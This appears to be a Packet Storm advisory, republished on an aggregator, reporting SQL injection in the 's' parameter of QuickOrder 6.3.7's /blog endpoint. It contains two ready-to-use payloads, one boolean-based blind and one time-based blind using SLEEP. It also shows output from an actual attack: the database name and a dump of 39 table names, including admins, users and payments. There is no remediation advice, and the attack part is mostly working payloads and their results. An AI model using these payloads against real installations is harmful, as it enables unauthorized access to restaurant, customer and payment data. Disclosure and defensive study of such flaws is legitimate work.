QuickOrder 6.3.7 SQL Injection

🗓️ 11 Jul 2023 00:00:00Reported by CraCkErType
packetstorm🔗 packetstormsecurity.com👁 234 Views
QuickOrder 6.3.7 SQL Injection vulnerability with database access and potential data modificatio
`┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : https://quickorder.by-code.com │  
│ Vendor : bylancer │  
│ Software : QuickOrder 6.3.7 │  
│ Vuln Type: SQL Injection │  
│ Impact : Database Access │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and │  
│ damage to a company's reputation. │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Path: /blog  
  
https://website/blog?s=[SQLI]  
  
  
GET parameter 's' is vulnerable to SQL Injection  
  
---  
Parameter: s (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: s=1') OR 02445=2445 OR ('04586'='4586  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (IF - comment)  
Payload: s=1'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z  
---  
  
  
[+] Starting the Attack  
  
fetching current database  
current database: 'quickordercode_**'  
  
  
fetching tables  
  
[39 tables]  
+-------------------------+  
| qr_orders |  
| qr_order_items |  
| qr_blog_comment |  
| qr_payments |  
| qr_menu_variants |  
| qr_options |  
| qr_time_zones |  
| qr_countries |  
| qr_restaurant |  
| qr_blog_categories |  
| qr_logs |  
| qr_image_menu |  
| qr_balance |  
| qr_blog |  
| qr_menu |  
| qr_user |  
| qr_pages |  
| qr_menu_extras |  
| qr_taxes |  
| qr_upgrades |  
| qr_usergroups |  
| qr_faq_entries |  
| qr_transaction |  
| qr_restaurant_options |  
| qr_languages |  
| qr_admins |  
| qr_allergies |  
| qr_user_options |  
| qr_order_item_extras |  
| qr_subscriptions |  
| qr_menu_variant_options |  
| qr_plans |  
| qr_testimonials |  
| qr_plan_options |  
| qr_catagory_main |  
| qr_currencies |  
| qr_restaurant_view |  
| qr_waiter_call |  
| qr_blog_cat_relation |  
+-------------------------+  
  
  
  
[-] Done  
`
11 Jul 2023 00:00Current
7.1High risk
Vulners AI Score7.1